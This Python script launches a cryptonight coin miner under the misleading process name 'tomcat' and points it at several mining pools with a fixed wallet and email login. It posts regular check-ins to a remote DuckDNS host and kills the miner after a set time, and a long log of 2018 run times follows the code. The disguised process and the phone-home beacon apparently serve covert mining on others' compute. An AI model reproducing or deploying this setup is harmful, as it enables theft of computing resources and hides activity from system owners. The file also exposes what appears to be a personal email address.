import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:24:01.422908
#2018-02-17 17:12:04.739148
#2018-02-17 19:00:10.534107
#2018-02-17 20:49:07.849900
#2018-02-17 22:37:02.109028
#2018-02-18 00:20:07.447876
#2018-02-18 02:11:06.842526
#2018-02-18 04:00:06.522496
#2018-02-18 05:51:05.140292
#2018-02-18 07:42:06.778145
#2018-02-18 09:29:05.733213
#2018-02-18 11:16:06.325149
#2018-02-18 13:02:05.446296
#2018-02-18 14:50:06.285950
#2018-02-18 16:39:04.986381
#2018-02-18 18:28:03.354760
#2018-02-18 20:16:07.123671
#2018-02-18 22:01:02.191011
#2018-02-18 23:50:01.383353
#2018-02-19 01:36:04.062138
#2018-02-19 03:25:06.580705
#2018-02-19 05:10:04.536727
#2018-02-19 06:55:06.894211
#2018-02-19 08:44:06.503132
#2018-02-19 10:34:07.265717
#2018-02-19 12:21:01.416830
#2018-02-19 14:08:06.681094
#2018-02-19 15:57:08.797028
#2018-02-19 17:47:20.422129
#2018-02-19 19:34:02.316137
#2018-02-19 21:21:05.699857
#2018-02-19 23:07:05.041827
#2018-02-20 00:51:01.434384
#2018-02-20 02:40:02.010802
#2018-02-20 04:29:06.086000
#2018-02-20 06:13:06.863808
#2018-02-20 07:58:05.630051
#2018-02-20 09:43:08.327325
#2018-02-20 11:27:10.789243
#2018-02-20 13:15:04.495091
#2018-02-20 15:01:08.217447
#2018-02-20 16:47:10.683520
#2018-02-20 18:35:02.183546
#2018-02-20 20:25:05.463309
#2018-02-20 22:10:07.332201
#2018-02-20 23:52:04.074821
#2018-02-21 01:39:04.469028
#2018-02-21 03:26:08.710844
#2018-02-21 05:15:08.473671
#2018-02-21 07:05:03.250872
#2018-02-21 08:50:09.416279
#2018-02-21 10:38:06.334455
#2018-02-21 12:26:02.125180
#2018-02-21 14:13:01.645172
#2018-02-21 15:59:08.184642
#2018-02-21 17:51:10.174159
#2018-02-21 19:36:06.239845
#2018-02-21 21:24:07.708805
#2018-02-21 23:11:01.290979
#2018-02-22 01:01:04.976673
#2018-02-22 02:48:06.890364
#2018-02-22 04:34:05.802658
#2018-02-22 06:19:06.047800
#2018-02-22 08:06:08.005467
#2018-02-22 09:53:05.689679
#2018-02-22 11:38:04.888394
#2018-02-22 13:25:05.137649
#2018-02-22 15:13:07.558121
#2018-02-22 16:59:02.008723
#2018-02-22 18:47:08.883053
#2018-02-22 20:40:06.785050
#2018-02-22 22:27:07.211469
#2018-02-23 00:14:05.444063
#2018-02-23 02:09:03.700996
#2018-02-23 03:58:07.460357
#2018-02-23 05:44:07.889133
#2018-02-23 07:34:03.440429
#2018-02-23 09:37:02.057199
#2018-02-23 11:41:09.880672
#2018-02-23 13:31:07.166650
#2018-02-23 15:17:05.245586
#2018-02-23 17:05:09.649686
#2018-02-23 18:52:02.043521
#2018-02-23 20:38:08.254548
#2018-02-23 22:26:08.091861
#2018-02-24 00:12:04.602109
#2018-02-24 02:05:08.042547
#2018-02-24 03:55:05.073469
#2018-02-24 05:41:01.321804
#2018-02-24 07:32:01.918673
#2018-02-24 09:18:02.158628
#2018-02-24 11:13:05.985460
#2018-02-24 13:02:01.555806
#2018-02-24 14:49:07.669484
#2018-02-24 16:41:03.681179
#2018-02-24 18:29:07.349462
#2018-02-24 20:16:03.287957
#2018-02-24 22:07:04.265540
#2018-02-25 01:05:01.428702
#2018-02-25 03:57:06.756732
#2018-02-25 06:41:05.485345
#2018-02-25 11:36:06.444366
#2018-02-25 13:28:01.240501
#2018-02-25 15:01:02.099750